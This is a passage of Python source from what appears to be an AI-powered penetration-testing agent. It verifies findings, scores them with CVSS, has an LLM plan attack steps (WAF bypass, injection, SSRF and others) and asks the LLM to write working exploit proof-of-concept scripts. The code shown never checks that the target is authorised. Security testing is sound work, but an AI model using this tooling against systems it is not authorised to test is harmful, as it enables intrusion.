Questions:** 1. Does the evidence show the vulnerability being EXPLOITED, not just reflected? 2. Is there definitive proof of unsafe processing? 3. Could this evidence be normal application behavior or sanitized output? **IMPORTANT:** Be conservative. Many scanners report false positives. Only confirm if you see CLEAR exploitation evidence. Respond with exactly one of: - "CONFIRMED: [brief explanation of why this is definitely exploitable]" - "FALSE_POSITIVE: [brief explanation of why this is not a real vulnerability]" """ try: response = await self.llm.generate(prompt, "You are a senior penetration tester reviewing vulnerability findings. Be extremely strict - false positives waste client time and damage credibility. Only confirm findings with definitive exploitation evidence.") return "CONFIRMED" in response.upper() except: # If AI fails, trust the technical verification return True def _create_finding(self, vuln_type: str, url: str, param: str, payload: str, evidence: str, response: Dict) -> Finding: """Create a finding object with full technical details""" severity = self._get_severity(vuln_type) finding_id = hashlib.md5(f"{vuln_type}{url}{param}".encode()).hexdigest()[:8] parsed = urlparse(url) path = parsed.path or '/' # Build a more realistic HTTP request representation full_url = response.get('url', url) method = response.get('method', 'GET') status = response.get('status', 200) http_request = f"""{method} {path}?{param}={payload} HTTP/1.1 Host: {parsed.netloc} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close""" # Format response excerpt response_body = response.get('body', '')[:1000] http_response = f"""HTTP/1.1 {status} OK Content-Type: {response.get('content_type', 'text/html')} {response_body}""" return Finding( id=finding_id, title=f"{vuln_type.upper()} in {path}", severity=severity, vulnerability_type=vuln_type, cvss_score=self._get_cvss_score(vuln_type), cvss_vector=self._get_cvss_vector(vuln_type), affected_endpoint=full_url, parameter=param, payload=payload, evidence=evidence, response=http_response, request=http_request, ai_verified=self.llm.is_available(), confidence="high" if self.llm.is_available() else "medium" ) def _get_cvss_vector(self, vuln_type: str) -> str: """Get CVSS 3.1 vector string for vulnerability type""" vectors = { "rce": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "sqli": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "ssti": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "lfi": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "ssrf": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "xss": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "idor": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "open_redirect": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N", } return vectors.get(vuln_type, "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N") def _get_severity(self, vuln_type: str) -> str: """Get severity for vulnerability type""" return { "rce": "critical", "sqli": "critical", "ssti": "critical", "lfi": "high", "ssrf": "high", "xss": "high", "idor": "medium", "open_redirect": "medium", }.get(vuln_type, "medium") def _get_cvss_score(self, vuln_type: str) -> float: """Get CVSS score for vulnerability type""" return { "rce": 9.8, "sqli": 9.1, "ssti": 9.1, "lfi": 7.5, "ssrf": 7.5, "xss": 6.1, "idor": 5.3, "open_redirect": 4.3, }.get(vuln_type, 5.0) # ==================== AI ENHANCEMENT ==================== async def _ai_enhance_findings(self): """Enhance findings with AI-generated details""" if not self.llm.is_available(): await self.log("info", " Skipping AI enhancement (LLM not available)") return for finding in self.findings: await self.log("info", f" Enhancing: {finding.title}") enhanced = await self._enhance_single_finding(finding) finding.cwe_id = enhanced.get("cwe_id", "") finding.description = enhanced.get("description", "") finding.impact = enhanced.get("impact", "") finding.poc_code = enhanced.get("poc_code", "") finding.remediation = enhanced.get("remediation", "") finding.references = enhanced.get("references", []) if enhanced.get("cvss_score"): finding.cvss_score = enhanced["cvss_score"] if enhanced.get("cvss_vector"): finding.cvss_vector = enhanced["cvss_vector"] async def _enhance_single_finding(self, finding: Finding) -> Dict: """AI enhancement for single finding""" prompt = f"""Generate comprehensive details for this confirmed security vulnerability to include in a professional penetration testing report. **Vulnerability Details:** - Type: {finding.vulnerability_type.upper()} - Title: {finding.title} - Affected Endpoint: {finding.affected_endpoint} - Vulnerable Parameter: {finding.parameter} - Payload Used: {finding.payload} - Evidence: {finding.evidence} **Required Output:** 1. **CVSS 3.1 Score:** Calculate accurately based on: - Attack Vector (AV): Network (most web vulns) - Attack Complexity (AC): Low/High based on prerequisites - Privileges Required (PR): None/Low/High - User Interaction (UI): None/Required - Scope (S): Unchanged/Changed - Impact: Confidentiality/Integrity/Availability 2. **CWE ID:** Provide the MOST SPECIFIC CWE for this vulnerability type: - SQL Injection: CWE-89 (or CWE-564 for Hibernate) - XSS Reflected: CWE-79, Stored: CWE-79 - LFI: CWE-22 or CWE-98 - SSTI: CWE-94 or CWE-1336 - SSRF: CWE-918 - RCE: CWE-78 (OS Command) or CWE-94 (Code Injection) 3. **Description:** Write 2-3 paragraphs explaining: - What the vulnerability is and how it was discovered - Technical details of how the exploitation works - The specific context in this application 4. **Impact:** Describe REALISTIC business and technical impact: - What data/systems could be compromised? - What's the worst-case scenario? - Compliance implications (PCI-DSS, GDPR, etc.) 5. **Proof of Concept:** Working Python script that: - Uses the requests library - Demonstrates the vulnerability - Includes comments explaining each step 6. **Remediation:** Specific, actionable steps: - Code-level fixes (with examples) - Framework/library recommendations - Defense-in-depth measures 7. **References:** Include links to: - OWASP guidance - CWE/CVE if applicable - Vendor documentation Respond in JSON format: {{ "cvss_score": 8.5, "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "cwe_id": "CWE-89", "description": "A SQL injection vulnerability...", "impact": "An attacker could...", "poc_code": "import requests\\n\\n# PoC for SQL Injection\\n...", "remediation": "1. Use parameterized queries...\\n2. Implement input validation...", "references": ["https://owasp.org/Top10/A03_2021-Injection/", "https://cwe.mitre.org/data/definitions/89.html"] }}""" try: response = await self.llm.generate(prompt, "You are a senior penetration tester writing findings for an enterprise client. Be thorough, accurate, and professional. The report will be reviewed by security teams and executives.") match = re.search(r'\{.*\}', response, re.DOTALL) if match: return json.loads(match.group()) except Exception as e: await self.log("debug", f"AI enhance error: {e}") return {} # ==================== PROMPT-ONLY MODE ==================== async def _run_prompt_only(self) -> Dict: """Prompt-only mode - AI decides everything""" await self.log("warning", "PROMPT-ONLY MODE: AI will decide what tools to use") await self.log("warning", "This mode uses more tokens than other modes") await self._update_progress(0, "AI Planning") prompt = self.custom_prompt or (self.task.prompt if hasattr(self.task, 'prompt') else "") if not prompt: prompt = "Perform a comprehensive security assessment" # Phase 1: AI Planning await self.log("info", "[PHASE 1/4] AI Planning") plan = await self._ai_create_plan(prompt) await self._update_progress(25, "Plan created") # Phase 2: Execute Plan await self.log("info", "[PHASE 2/4] Executing Plan") for step in plan.get("steps", ["recon", "test", "report"]): await self.log("info", f" Executing: {step}") await self._execute_plan_step(step) await self._update_progress(70, "Plan executed") # Phase 3: Analyze Results await self.log("info", "[PHASE 3/4] Analyzing Results") await self._ai_enhance_findings() await self._update_progress(85, "Analysis complete") # Phase 4: Generate Report await self.log("info", "[PHASE 4/4] Generating Report") report = await self._generate_full_report() await self._update_progress(100, "Complete") return report async def _ai_create_plan(self, prompt: str) -> Dict: """AI creates execution plan""" if not self.llm.is_available(): return {"steps": ["recon", "test", "report"]} system = """You are an autonomous penetration testing agent. Your role is to: 1. Understand the user's security testing request 2. Create an efficient, targeted testing plan 3. Ensure thorough coverage while avoiding redundant testing Always start with reconnaissance unless already done, and always end with report generation.""" plan_prompt = f"""**Security Testing Request:** User Request: {prompt} Target: {self.target} **Available Actions (predefined):** - recon: Discover endpoints, parameters, forms, and technologies - scan_sqli: Test for SQL injection - scan_xss: Test for Cross-Site Scripting - scan_lfi: Test for Local File Inclusion / Path Traversal - scan_ssti: Test for Server-Side Template Injection - scan_ssrf: Test for Server-Side Request Forgery - clickjacking: Test for Clickjacking - security_headers: Test security headers - cors: Test for CORS misconfigurations - scan_all: Comprehensive vulnerability testing - report: Generate final assessment report **IMPORTANT: You can also use ANY custom vulnerability type as a step!** For vulnerabilities not in the predefined list, just use the vulnerability name as the step. The AI will dynamically generate tests for it. Examples of custom steps you can use: - "xxe" - XML External Entity injection - "race_condition" - Race condition testing - "rate_limit_bypass" - Rate limiting bypass - "jwt_vulnerabilities" - JWT security issues - "bola" - Broken Object Level Authorization - "bfla" - Broken Function Level Authorization - "graphql_injection" - GraphQL specific attacks - "nosql_injection" - NoSQL injection - "waf_bypass" - WAF bypass techniques - "csp_bypass" - CSP bypass techniques - "prototype_pollution" - Prototype pollution - "deserialization" - Insecure deserialization - "mass_assignment" - Mass assignment vulnerabilities - "business_logic" - Business logic flaws - Any other vulnerability type you can think of! **Planning Guidelines:** 1. Start with 'recon' to gather information 2. Add steps based on user request - use predefined OR custom vulnerability names 3. Always end with 'report' **Examples:** - "Test for XXE" → {{"steps": ["recon", "xxe", "report"]}} - "Check race conditions and rate limiting" → {{"steps": ["recon", "race_condition", "rate_limit_bypass", "report"]}} - "Test BOLA and BFLA" → {{"steps": ["recon", "bola", "bfla", "report"]}} - "Full API security test" → {{"steps": ["recon", "bola", "bfla", "jwt_vulnerabilities", "mass_assignment", "report"]}} - "WAF bypass and XSS" → {{"steps": ["recon", "waf_bypass", "scan_xss", "report"]}} Respond with your execution plan in JSON format: {{"steps": ["action1", "action2", ...]}}""" try: response = await self.llm.generate(plan_prompt, system) match = re.search(r'\{.*\}', response, re.DOTALL) if match: return json.loads(match.group()) except: pass # Fallback: parse prompt keywords to determine steps # This fallback now supports ANY vulnerability type via AI dynamic testing prompt_lower = prompt.lower() steps = ["recon"] # Known vulnerability mappings vuln_mappings = { # Predefined tests "clickjack": "clickjacking", "x-frame": "clickjacking", "framing": "clickjacking", "security header": "security_headers", "cors": "cors", "sqli": "scan_sqli", "sql injection": "scan_sqli", "xss": "scan_xss", "cross-site script": "scan_xss", "lfi": "scan_lfi", "file inclusion": "scan_lfi", "path traversal": "scan_lfi", "ssti": "scan_ssti", "template injection": "scan_ssti", "ssrf": "scan_ssrf", # Advanced vulnerabilities - will use AI dynamic testing "xxe": "xxe", "xml external": "xxe", "race condition": "race_condition", "race": "race_condition", "rate limit": "rate_limit_bypass", "rate-limit": "rate_limit_bypass", "bola": "bola", "broken object": "bola", "bfla": "bfla", "broken function": "bfla", "idor": "idor", "insecure direct": "idor", "jwt": "jwt_vulnerabilities", "graphql": "graphql_injection", "nosql": "nosql_injection", "waf bypass": "waf_bypass", "waf": "waf_bypass", "csp bypass": "csp_bypass", "prototype pollution": "prototype_pollution", "deserialization": "deserialization", "deserial": "deserialization", "mass assignment": "mass_assignment", "business logic": "business_logic", "open redirect": "open_redirect", "subdomain takeover": "subdomain_takeover", "host header": "host_header_injection", "cache poison": "cache_poisoning", "http smuggling": "http_smuggling", "request smuggling": "http_smuggling", "web cache": "cache_poisoning", "parameter pollution": "parameter_pollution", "hpp": "parameter_pollution", "type juggling": "type_juggling", "timing attack": "timing_attack", "command injection": "command_injection", "rce": "command_injection", } matched_steps = set() for keyword, step in vuln_mappings.items(): if keyword in prompt_lower: matched_steps.add(step) if matched_steps: steps.extend(list(matched_steps)) else: # No known keywords matched - pass the entire prompt as a custom step # The AI dynamic testing will handle it custom_step = prompt.strip()[:100] # Limit length if custom_step and custom_step.lower() not in ["test", "scan", "check", "find"]: steps.append(custom_step) else: steps.append("scan_all") steps.append("report") return {"steps": steps} async def _execute_plan_step(self, step: str): """Execute a plan step - supports ANY vulnerability type via AI dynamic testing""" step_lower = step.lower() await self.log("debug", f"Executing plan step: {step}") # Known vulnerability types with predefined tests if "recon" in step_lower or "information" in step_lower or "discovery" in step_lower: await self._run_recon_only() elif "scan_all" in step_lower: await self._test_all_vulnerabilities(self._default_attack_plan()) elif "sqli" in step_lower or "sql injection" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["sqli"]}) elif "xss" in step_lower or "cross-site script" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["xss"]}) elif "lfi" in step_lower or "local file" in step_lower or "path traversal" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["lfi"]}) elif "ssti" in step_lower or "template injection" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["ssti"]}) elif "ssrf" in step_lower or "server-side request" in step_lower: await self._test_all_vulnerabilities({"priority_vulns": ["ssrf"]}) elif "clickjack" in step_lower or "x-frame" in step_lower or "framing" in step_lower: await self.log("info", " Testing for clickjacking/X-Frame-Options") await self._test_security_headers("clickjacking") elif "security_header" in step_lower or ("header" in step_lower and "security" in step_lower): await self.log("info", " Testing security headers") await self._test_security_headers("all") elif "cors" in step_lower: await self.log("info", " Testing CORS configuration") await self._test_cors() elif "info_disclos" in step_lower or ("information" in step_lower and "disclosure" in step_lower): await self.log("info", " Testing for information disclosure") await self._test_information_disclosure() elif "report" in step_lower or "document" in step_lower: await self.log("info", " Report will be generated at the end") else: # AI DYNAMIC TESTING - handles ANY vulnerability type! # Examples: XXE, Race Condition, Rate Limiting, BOLA, BFLA, JWT, GraphQL, # NoSQL Injection, WAF Bypass, CSP Bypass, Prototype Pollution, etc. await self.log("info", f" [AI] Dynamic testing for: {step}") await self._ai_dynamic_test(step) # ==================== ANALYZE-ONLY MODE ==================== async def _run_analyze_only(self) -> Dict: """Analyze-only mode""" await self.log("info", "ANALYZE-ONLY MODE: No active testing") await self._update_progress(0, "Starting analysis") # Load any provided context if self.recon_context: await self.log("info", "[PHASE 1/2] Loading context") self._load_context() else: await self.log("info", "[PHASE 1/2] Passive reconnaissance") await self._initial_probe() await self._update_progress(50, "Context loaded") # AI Analysis await self.log("info", "[PHASE 2/2] AI Analysis") analysis = await self._ai_passive_analysis() await self._update_progress(100, "Analysis complete") return { "type": "analysis_only", "target": self.target, "mode": self.mode.value, "scan_date": datetime.utcnow().isoformat(), "analysis": analysis, "recon": { "endpoints": len(self.recon.endpoints), "technologies": self.recon.technologies }, "findings": [], "recommendations": ["Perform active testing for complete assessment"] } def _load_context(self): """Load recon context""" if not self.recon_context: return data = self.recon_context.get("data", {}) self.recon.endpoints = [{"url": e} for e in data.get("endpoints", [])] self.recon.technologies = data.get("technologies", []) async def _ai_passive_analysis(self) -> str: """AI passive analysis""" if not self.llm.is_available(): return "LLM not available for analysis" context = f"""Target: {self.target} Endpoints: {[_get_endpoint_url(e) for e in self.recon.endpoints[:20]]} Technologies: {self.recon.technologies} Forms: {len(self.recon.forms)}""" prompt = f"""Perform a security analysis WITHOUT active testing: {context} Analyze and identify: 1. Potential security risks 2. Areas requiring testing 3. Technology-specific concerns 4. Recommendations Provide your analysis:""" try: return await self.llm.generate(prompt, "You are a security analyst. Analyze without active testing.") except: return "Analysis failed" # ==================== REPORT GENERATION ==================== def _generate_recon_report(self) -> Dict: """Generate recon report""" return { "type": "reconnaissance", "target": self.target, "mode": self.mode.value, "scan_date": datetime.utcnow().isoformat(), "summary": { "target": self.target, "endpoints_found": len(self.recon.endpoints), "forms_found": len(self.recon.forms), "technologies": self.recon.technologies, }, "data": { "endpoints": self.recon.endpoints[:50], "forms": self.recon.forms[:20], "technologies": self.recon.technologies, "api_endpoints": self.recon.api_endpoints[:20], }, "findings": [], "recommendations": ["Proceed with vulnerability testing"] } async def _generate_full_report(self) -> Dict: """Generate comprehensive report""" # Convert findings to dict findings_data = [] for f in self.findings: findings_data.append({ "id": f.id, "title": f.title, "severity": f.severity, "vulnerability_type": f.vulnerability_type, "cvss_score": f.cvss_score, "cvss_vector": f.cvss_vector, "cwe_id": f.cwe_id, "description": f.description, "affected_endpoint": f.affected_endpoint, "parameter": f.parameter, "payload": f.payload, "evidence": f.evidence, "impact": f.impact, "poc_code": f.poc_code, "remediation": f.remediation, "references": f.references, "ai_verified": f.ai_verified, "confidence": f.confidence, }) # Count by severity severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0} for f in self.findings: severity_counts[f.severity] = severity_counts.get(f.severity, 0) + 1 # Generate recommendations recommendations = self._generate_recommendations() report = { "type": "full_assessment", "target": self.target, "mode": self.mode.value, "scan_date": datetime.utcnow().isoformat(), "duration": "N/A", "summary": { "target": self.target, "mode": self.mode.value, "total_findings": len(self.findings), "severity_breakdown": severity_counts, "endpoints_tested": len(self.recon.endpoints), "technologies": self.recon.technologies, "risk_level": self._calculate_risk_level(severity_counts), }, "findings": findings_data, "recommendations": recommendations, "executive_summary": await self._generate_executive_summary(findings_data, severity_counts) } # Log summary await self.log("info", "=" * 60) await self.log("info", "ASSESSMENT COMPLETE") await self.log("info", f"Total Findings: {len(self.findings)}") await self.log("info", f" Critical: {severity_counts['critical']}") await self.log("info", f" High: {severity_counts['high']}") await self.log("info", f" Medium: {severity_counts['medium']}") await self.log("info", f" Low: {severity_counts['low']}") await self.log("info", "=" * 60) return report async def _generate_executive_summary(self, findings: List, counts: Dict) -> str: """Generate executive summary""" if not self.llm.is_available() or not findings: if counts.get('critical', 0) > 0: return f"Critical vulnerabilities found requiring immediate attention. {counts['critical']} critical and {counts['high']} high severity issues identified." elif counts.get('high', 0) > 0: return f"High severity vulnerabilities found. {counts['high']} high severity issues require prompt remediation." else: return "Assessment completed. Review findings and implement recommended security improvements." # Build finding summary for context finding_summary = [] for f in findings[:5]: finding_summary.append(f"- [{f.get('severity', 'unknown').upper()}] {f.get('title', 'Unknown')}") risk_level = self._calculate_risk_level(counts) prompt = f"""Generate a professional executive summary for this penetration testing report. **Assessment Overview:** - Target: {self.target} - Assessment Type: Automated Security Assessment - Overall Risk Rating: {risk_level} **Findings Summary:** - Total Vulnerabilities: {len(findings)} - Critical: {counts.get('critical', 0)} - High: {counts.get('high', 0)} - Medium: {counts.get('medium', 0)} - Low: {counts.get('low', 0)} - Informational: {counts.get('info', 0)} **Key Findings:** {chr(10).join(finding_summary) if finding_summary else '- No significant vulnerabilities identified'} **Required Output:** Write a 3-4 sentence executive summary that: 1. States the overall security posture (good/needs improvement/critical issues) 2. Highlights the most important finding(s) and their business impact 3. Provides a clear call to action for remediation Write in a professional, non-technical tone suitable for C-level executives and board members.""" try: return await self.llm.generate(prompt, "You are a senior security consultant presenting findings to executive leadership. Be concise, professional, and focus on business impact rather than technical details.") except: return "Assessment completed. Review findings for details." def _calculate_risk_level(self, counts: Dict) -> str: """Calculate overall risk level""" if counts.get("critical", 0) > 0: return "CRITICAL" elif counts.get("high", 0) > 0: return "HIGH" elif counts.get("medium", 0) > 0: return "MEDIUM" elif counts.get("low", 0) > 0: return "LOW" return "INFO" def _generate_recommendations(self) -> List[str]: """Generate recommendations""" recommendations = [] vuln_types = set(f.vulnerability_type for f in self.findings) if "sqli" in vuln_types: recommendations.append("Implement parameterized queries/prepared statements to prevent SQL injection") if "xss" in vuln_types: recommendations.append("Implement output encoding and Content Security Policy (CSP) headers") if "lfi" in vuln_types: recommendations.append("Validate and sanitize all file path inputs; implement allowlists") if "ssti" in vuln_types: recommendations.append("Use logic-less templates or properly sandbox template engines") if "ssrf" in vuln_types: recommendations.append("Validate and restrict outbound requests; use allowlists for URLs") if "rce" in vuln_types: recommendations.append("Avoid executing user input; use safe APIs instead of system commands") if not recommendations: recommendations.append("Continue regular security assessments and penetration testing") recommendations.append("Implement security headers (CSP, X-Frame-Options, etc.)") recommendations.append("Keep all software and dependencies up to date") return recommendations def _generate_error_report(self, error: str) -> Dict: """Generate error report""" return { "type": "error", "target": self.target, "mode": self.mode.value, "error": error, "findings": [], "summary": {"error": error} }